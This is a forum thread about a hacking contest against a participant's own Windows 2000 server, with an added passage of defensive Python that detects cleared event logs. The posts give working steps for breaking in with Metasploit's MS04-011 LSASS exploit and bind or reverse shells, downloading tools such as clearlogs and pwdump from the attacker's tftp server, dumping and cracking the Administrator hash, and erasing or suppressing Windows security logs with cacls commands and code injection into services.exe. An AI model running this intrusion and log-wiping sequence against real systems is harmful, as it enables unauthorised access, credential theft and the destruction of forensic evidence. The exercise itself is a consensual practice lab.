
Security practice (contest)


Comments

  • Closed Accounts Posts: 891 ✭✭✭conceited


    Well there's plenty of activity now.
    Nice to see you trying gerry.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Ok I cleared my logs, and probably everyone else's.

    Stole the Administrator's hash also...
    A country! Not in our continent!


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Good job Damo, I just checked the logs.
    Stealing the admin password :rolleyes:


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    I'm gonna have a feed of Guinness now!


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Enjoy :)


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    conceited wrote: »
    Enjoy :)

    Were the logs OK? Did you see anything from me and not the others attempting the challenge? Using my phone to post this.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    http://www.ultimatewindowssecurity.com/events/com185.html :D
    That was the only log; I'm not sure if it can be cleared?
    This is quite interesting, as I never knew this would happen.
    Since you're on your phone, it was this:
    "Event 517 is logged whenever the Security log is cleared, REGARDLESS of the status of the Audit System Events audit policy."

    I'll leave it up anyway, feel free to work away.
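
The point above, that Event 517 is written into the freshly cleared log regardless of audit policy, is what a defender keys on; the later posts about stopping the Event Log service and deleting the .evt files leave a different trace, a service state change plus a silent gap. Here is an added example (my own code, not from this thread or any poster) that triages a constructed CSV export of a Windows event log for those three things. The CSV layout and message wording are assumptions; the event IDs (517, its Vista+ equivalent 1102, and Service Control Manager 7036 for a service state change) are real.

```python
"""
Added example (not from the thread): triage a Windows Event Log export for the
"log cleared" record (Event 517 on Windows 2000/XP/2003, 1102 on Vista and
later), the Event Log service being stopped (Service Control Manager Event
7036), and the silent gap that a stop / delete *.evt / restart leaves behind.

The input is a constructed CSV export, not a real log.
"""
import csv
from datetime import datetime, timedelta
from io import StringIO

LOG_CLEARED_IDS = {517, 1102}   # Security log cleared, old and new IDs
SCM_STATE_CHANGE_ID = 7036      # "The X service entered the Y state."

# Constructed sample export. Columns and message wording are assumptions
# about the export format; the event IDs are real Windows IDs.
SAMPLE_EXPORT = """\
time,source,event_id,message
2009-02-10 21:00:05,Security,528,Successful Logon: User Name: Administrator
2009-02-10 21:03:41,Security,517,The audit log was cleared. Client User Name: Administrator
2009-02-10 21:04:10,Service Control Manager,7036,The Event Log service entered the stopped state.
2009-02-10 23:30:00,Service Control Manager,7036,The Event Log service entered the running state.
2009-02-10 23:31:12,Security,528,Successful Logon: User Name: hackme
"""


def parse_export(text):
    """Parse the CSV export into dicts with a datetime and an int event_id, sorted by time."""
    records = []
    for row in csv.DictReader(StringIO(text)):
        records.append({
            "time": datetime.strptime(row["time"], "%Y-%m-%d %H:%M:%S"),
            "source": row["source"],
            "event_id": int(row["event_id"]),
            "message": row["message"],
        })
    records.sort(key=lambda r: r["time"])
    return records


def find_log_cleared(records):
    """Records that mark a Security log clear. Event 517 is written into the
    fresh log after the clear whatever the audit policy says, so a local
    clear cannot remove the evidence of itself; forward it off-box."""
    return [r for r in records if r["event_id"] in LOG_CLEARED_IDS]


def find_eventlog_service_stops(records):
    """SCM 7036 records saying the Event Log service itself stopped."""
    return [
        r for r in records
        if r["event_id"] == SCM_STATE_CHANGE_ID
        and "Event Log service" in r["message"]
        and "stopped state" in r["message"]
    ]


def find_gaps(records, max_gap):
    """Pairs of consecutive records separated by more than max_gap. A host that
    normally logs steadily but goes silent for hours is worth a look, because
    stopping the service and deleting *.evt leaves exactly that shape."""
    gaps = []
    for prev, nxt in zip(records, records[1:]):
        if nxt["time"] - prev["time"] > max_gap:
            gaps.append((prev, nxt))
    return gaps


def triage(text, max_gap=timedelta(hours=1)):
    """Run all three checks over an export and return a summary dict."""
    records = parse_export(text)
    return {
        "cleared": find_log_cleared(records),
        "service_stops": find_eventlog_service_stops(records),
        "gaps": find_gaps(records, max_gap),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_EXPORT)
    for r in result["cleared"]:
        print(f"{r['time']} log cleared (event {r['event_id']}): {r['message']}")
    for r in result["service_stops"]:
        print(f"{r['time']} Event Log service stopped")
    for prev, nxt in result["gaps"]:
        print(f"{prev['time']} -> {nxt['time']} silent for {nxt['time'] - prev['time']}")
```

On the sample it reports the 517 at 21:03, the service stop at 21:04 and a two-and-a-half-hour gap until the service came back. The gap heuristic only works on a host whose normal logging rate you know, so tune max_gap per host class rather than using one value everywhere.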


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Stop the event log service, or is that not allowed?
    You can re-schedule the service to start after you've left the system.
    Another way is to disable auditing of those events.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    IP Address change.
    83.70.110.27

    As far as I know, if you turn it off it still logs it, it seems. I just read that on a site; this is very interesting.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    I was thinking of a few ways; the least desirable method would be to kill the service (stop reboot with: shutdown -a) or disable the startup, then restart the system - could cause problems.

    Since only SYSTEM has full access to the event logs, what would happen if changing the ACL to deny everyone access?

    It will accept SERVICE_CONTROL_SHUTDOWN, but I don't know if that'll work.. probably would if running inside a SYSTEM process; if not you could inject a DLL into the remote process that normally handles it.

    Has to be a much easier way though.. never thought about it, but it's interesting alright.
    ....
    A crude / simple hack I thought about last night was the fact these logs have the ACL set for SYSTEM to have full access.

    Tested this on XP SP2, so maybe there is an easier way on Win2k SP0..?

    * Deny SYSTEM access
    * Grant Administrator access
    * Clear logs using command line tool..
    * Grant SYSTEM access
    cacls C:\windows\system32\config\secevent.evt /D SYSTEM
    cacls C:\windows\system32\config\secevent.evt /E /G Administrator:F
    psloglist security -c
    cacls C:\windows\system32\config\secevent.evt /G SYSTEM:F
    

    This corrupts the security log though.. and requires you to [Clear all events] - does get rid of the 517 message though.

    On XP + 2k3, there is the volume shadow copy service which will allow replacing files even when they're "locked".

    The more painful method would be to obtain the SERVICE_STATUS_HANDLE for the EVENTLOG service and re-enable SERVICE_ACCEPT_STOP using SetServiceStatus() OR patch the kernel with a driver.. or some other crappy way to stop the event log.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    I know I tried to stop the event logger by "net stop even...." and it said stop/pause was unsupported for this service.

    I saw a write-up about creating a reg entry to disable the event logger, but it required a reboot. Then you can manually delete the *.evt files.


    psloglist doesn't exist on Win 2000 but I'm sure it's just a matter of transferring it across.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    If your ip changes much you should use dyndn.org or no-ip.com or similar.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    I'll do another report on this contest over the weekend if people want and if no-one else is attempting it?


  • Registered Users Posts: 13 livewire2k


    Well all, hmm.. I'm finding this challenge a bit harder! Thx again conceited, I'm going to keep trying this one!


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Hi lads,

    I'm reading up on the Windows APIs on MSDN and educating myself about this. I don't know much about it and will try some of your suggestions Joe.
    Damo, another report would be great. As I'm writing this now someone is trying the server. :pac:

    Limewire, glad you're finding this a challenge, a lot harder haha. Things are going to get a lot harder as the weeks go on. Won't be just exploits.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    psloglist doesn't exist on Win 2000 but I'm sure it's just a matter of transferring it across

    Should have said this is part of PsTools by Sysinternals.
    I'm reading up on the Windows APIs on MSDN and educating myself about this. I don't know much about it and will try some of your suggestions Joe.

    I looked at the internals of services.exe and it loads eventlog.dll which then creates the service.
    Wrote a program yesterday to try to stop it but I got fed up after the computer kept freezing, needing a reboot.

    You can enumerate the handles of a process from usermode using NtQuerySystemInformation and info class SystemHandleInformation, then use DuplicateHandle and.. I thought SetServiceStatus would work with SERVICE_ACCEPT_STOP.
    I'm gonna try injecting code into services.exe later to see if that works.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Just gave this a try tonight.

    There's no way to enumerate the service control handles, but each process that runs a service or more has a dispatch table with the service name, handler routine and control handle.

    StartServiceCtrlDispatcher allocates this structure from the heap, so you can walk the heap list and find the service table entry, then inject code into the remote process to call SetServiceStatus().

    I'll post code/more detail about this later as I think it might help in other situations such as terminating a malware service.. even though it didn't work for eventlog.
    c:\>sc query eventlog
    
    SERVICE_NAME: eventlog
            TYPE               : 20  WIN32_SHARE_PROCESS
            STATE              : 4  RUNNING
                                    (NOT_STOPPABLE,NOT_PAUSABLE,ACCEPTS_SHUTDOWN)
            WIN32_EXIT_CODE    : 0  (0x0)
            SERVICE_EXIT_CODE  : 0  (0x0)
            CHECKPOINT         : 0x0
            WAIT_HINT          : 0x0
    
    c:\>sevent 796       <-- process id of services.exe
    
    EVENTLOG service found, service handle = 000B9718
    Injecting code into remote process
    Creating remote thread with code:00CB0000 - data:006B0000
    Waiting for thread to exit...
    SetServiceStatus error code:0
    
    c:\>sc query eventlog
    
    SERVICE_NAME: eventlog
            TYPE               : 20  WIN32_SHARE_PROCESS
            STATE              : 3  STOP_PENDING
                                    (STOPPABLE,PAUSABLE,ACCEPTS_SHUTDOWN)
            WIN32_EXIT_CODE    : 0  (0x0)
            SERVICE_EXIT_CODE  : 0  (0x0)
            CHECKPOINT         : 0x0
            WAIT_HINT          : 0x0
    

    It appears to work, but when trying to stop with net.exe:
    c:\>net stop eventlog
    The service could not be controlled in its present state.
    
    More help is available by typing NET HELPMSG 2189.
    

    There is an internal routine called ElfBeginForcedShutdown() which you
    could *possibly* run remotely using a hardcoded address; haven't tried that yet.

    There's also StopLPCThread which terminates the local named pipe/port and thread that handles event messages sent from other applications..

    I'd not say it's impossible to stop the service in an elegant fashion, but for now
    I'm out of ideas - tbh, I was just curious to see how it could be terminated in a safe way.

    You can go ahead and kill services.exe, but the system becomes unstable after some time.

    Forgot to mention, the procedure that reports the event of the log being cleared is called ElfpGenerateLogClearedEvent().
    If you google that, you can find the actual Win2k source code that documents it...


  • Closed Accounts Posts: 41 acidstorm


    I can't even seem to get in.. I am so ashamed of myself right now. Metasploit can't send the RPC packets for the RPC-DCOM exploit even after I set a passthrough at my router. The RPC-DNS isn't working either. I know there are three ports open and I am still thinking of the last port...

    I don't know, but if the service is stopped, can Alternate Data Streams help to hide the logfiles themselves like... after wiping the previous one, thus hiding the fact that someone cleared them?

    As for me, I have just ordered Hacking Exposed "Windows... Solutions" to sharpen/develop my 1337 haXor skillz.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    can Alternate Data Streams help to hide the logfiles themselves like... after wiping the previous one, thus hiding the fact that someone cleared them?

    The event logs are opened by various different SYSTEM processes.. you can open them to read, but you can't write to them.. but it may be possible to inject code into LSASS.EXE which is allowed to write over them.

    hobocopy is a program that uses the VSCS to read/write any file on disk, although it's not supported on Win2k.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Some good discussions here.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    There is a way to stop the eventlog a lot easier than I thought.. and it can be restarted at any time without giving an error or making the system unstable. (not 100% now about this)

    Once stopped, delete the *.evt files from the %SYSTEMROOT%\system32\config folder and re-schedule/restart the service any time you want. (at least before any future reboot of the system)

    The ElfControlResponse handler registered when the service starts will only accept the SERVICE_CONTROL_SHUTDOWN code, which even when using the ControlService() API under the SYSTEM account gets ignored..

    The program I wrote goes through the heap list of SERVICES.EXE until it finds the EVENTLOG dispatch entry, then it uses CreateRemoteThread() pointing to ElfControlResponse with a parameter of SERVICE_CONTROL_SHUTDOWN - this works perfectly.

    EDIT: I just noticed that if the EL service is running before using this program (I've called it 'ELSTOP') you should also re-start it afterwards.. this might be nothing at all, but the system seemed to wait for a response from the event logger before shutting down.

    ELSTOP

    Can somebody test it on Win2k? Only ran on WinXP SP3 so far, works fine.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Thanks. Tested on Vista, didn't work.. but anyway, sorry if I hijacked the thread over this one thing. What about your report Damo?


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Just a quick write-up on the 2nd challenge.
    For this challenge, I mainly used Vista :-)

    Ok, first off I scan the victim with Nessus. You'll get many holes reported as being present on this system.
    They are mainly around Windows networking ports...
    Here are some which I found:

    MS RPC Services null pointer reference DoS (135)

    Microsoft Hotfix for KB835732 (SMB check) (139/445)
    http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

    Vulnerability in Plug and Play Could Allow Remote Code Execution and Local Elevation of Privilege (905749) - Network Check (139/445)
    http://www.microsoft.com/technet/security/bulletin/ms05-047.mspx

    Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) - Network Check (139/445)
    http://www.microsoft.com/technet/security/bulletin/ms05-039.mspx

    SMB OpenEventLog() over srvsvc (139/445)

    Vulnerability in Server Service Could Allow Remote Code Execution (921883) - Network check (139/445)
    http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx

    Vulnerability in Server Service Could Allow Remote Code Execution (917159) - Network check (139/445)
    http://www.microsoft.com/technet/security/bulletin/ms06-035.mspx

    Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) - Network Check (139/445)
    http://www.microsoft.com/technet/security/bulletin/ms05-043.mspx

    Vulnerability in SMB Could Allow Remote Code Execution (896422) - Network Check (139/445)
    http://www.microsoft.com/technet/security/bulletin/ms05-027.mspx

    SMB null param count DoS (139/445)

    MS Task Scheduler vulnerability (1025)
    http://www.microsoft.com/technet/security/bulletin/ms04-022.mspx



    Ok so we have many to choose from.
    Note: if your security scanner is not giving you many results, your ISP may have blocked Windows networking ports (135-139/445). This was common behaviour when the MS Blaster/Sasser and other worms were in the wild.


    Now that we know the weaknesses, we need to choose one and launch an exploit against that weakness. The best way to find exploits is to search for the MS bulletin announcement number for that weakness on sites such as milw0rm.com.
    For me, I chose Microsoft Hotfix for KB835732 (SMB check) (139/445), so I just search for 04-011 on milw0rm.com to see many exploits.
    http://www.milw0rm.com/exploits/295 would be ideal. If you don't have the time or environment to compile that source, you can simply install the Metasploit Framework available at www.metasploit.com. The web interface is probably the easiest if you are new to this. (some scripts in Metasploit may trigger your antivirus software). Metasploit contains exploits for most of the holes mentioned above; again I'll choose the same weakness as before, so search for SMB in Metasploit in the web interface, select Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow, which is a 04-011 exploit. The target is Windows 2000. Select the payload as windows/shell/bind_tcp (note: as conceited has forwarded all ports to this Win2k machine, whatever port our exploit binds a shell to will also be forwarded to the Win2k machine; if this wasn't the case, then we could have selected the payload windows/shell/reverse_tcp, this way the Win2k machine would connect back to us on a port with a reverse shell. You of course would need to have this port open in your router/firewall/gateway).

    After you select the payload, fill in the target IP address; the rest of the details are ok. Hit exploit. If the exploit is successful, you will be connected to the victim on whatever port you chose (4444 is default) and have a shell. There is a chance you'll crash the server either :-(


    Ok, we have to create a text file on the Administrator's desktop:
    chdir c:\documents and settings\Administrator\Desktop\
    echo Damo >> Damo.txt

    Now we have to clear logs. This is sorta tricky. What I did is send a file called clearlogs.exe to the server. (google it; again some antivirus don't like this file). You can send files to the server by hosting your own tftp/ftp server, explained in my previous report in this thread, and make the victim connect and download files from it.

    run:
    clearlogs -sec
    clearlogs -app
    clearlogs -sys
    del clearlogs.exe


    Or you can upload the tool Average Joe wrote (elfstop) to disable the Event Log service. Then delete the c:\winnt\system32\config\*.evt files. Start the event log service again.. net start "windows event log" might work?

    Now you have your name on the desktop and cleared your logs!

    As a bonus, I uploaded pwdump2 to the server. Snagged the Administrator's hash, used rainbow tables at #rainbowcrack on irc.plain-text.info. Within minutes you'll have the Administrator's password.
    If you want, you can then use a tool called psexec to launch commands on the server remotely. You can also browse Samba shares with Administrator credentials by going to \\xxx.xxx.xxx.xxx\c$\ or, if using Linux, then using the appropriate smb utility of your choice (Ubuntu has a really nice one; the folder you want to go to is c$, a default share). That's really it.

    Enjoy...


  • Registered Users Posts: 13 livewire2k


    Ok nice work DAMO2K on your second report! I am having trouble with this one, my ISP (I'm with Digiweb) must be blocking ports on me like 445 etc..

    So I didn't get this challenge done, I spent a day throwing exploits at the server, using Windows (XP Pro), BackTrack, Nessus & Metasploit but no good!

    Hope the next challenge will be a good one!

    Thx once again, Livewire, hope to chat yas soon

    conceited
    Damo2k
    Average Joe

    http://blacknite.eu


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Start the event log service again.. net start "windows event log" might work?

    either will work:

    net start eventlog
    sc start eventlog (sc might not be available on win2k)

    Good job, Damo.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Cheers :)


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Damo that report is great. It should help people out and hopefully get more interested in the challenges. I really liked the cracking the admin password part :)

    Joe you're a pretty smart guy, I tried your tool, works great.

    Changing 445 to 5445 for you livewire, try it from now on.
    The IP is now 83.70.108.245

    Hope you enjoyed this one.


  • Registered Users Posts: 13 livewire2k


    OK it's livewire here,

    Thx for changing the port conceited (it was my ISP blocking ports on me).
    Ok I did the same as Damo, loaded up Metasploit, filled in all the port numbers and IP, and it worked like a charm. Then I uploaded Pwdump4 via TFTP.
    This is the result I got (not showing admin pass, just the empty passwords):

    Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
    hackme:1000:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::

    I then downloaded clearlogs.exe and ran that (oh I also put the txt on the Desktop). Maybe I'll try to install VNC onto it and see how that works out.

    thx once again conceited

    peace livewire!


  • Registered Users Posts: 13 livewire2k


    Ok back again, just asking conceited: is it all right to install VNC on your server?
    If not that's grand, I've completed the challenge anyway, get back to me!

    Btw I could set up a challenge on a Linux server if wanted! Looking fwd to the next challenge!

    Peace Livewire


    http://blacknite.eu


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Funny thing for an ISP to do, isn't it? I wonder what's their reason for doing such a thing? Seen your text file livewire, did you feel it was difficult? Glad you got it.

    I haven't monitored the server much so VNC could already be installed for all I know :) I've taken down the server now anyway and I'm going to prepare the next challenge. If everything goes to plan it will be up for tomorrow night at 6pm.

    Livewire if you host a server I don't think you'll get many more people trying it than what's trying mine, but it's still fun either way. I actually thought a lot more people would be interested in it.

    Not all my challenges will involve ready-made exploits either, because anyone can click a mouse, as was said.
    Thanks again Damo2k, your reports of the hacks are great.

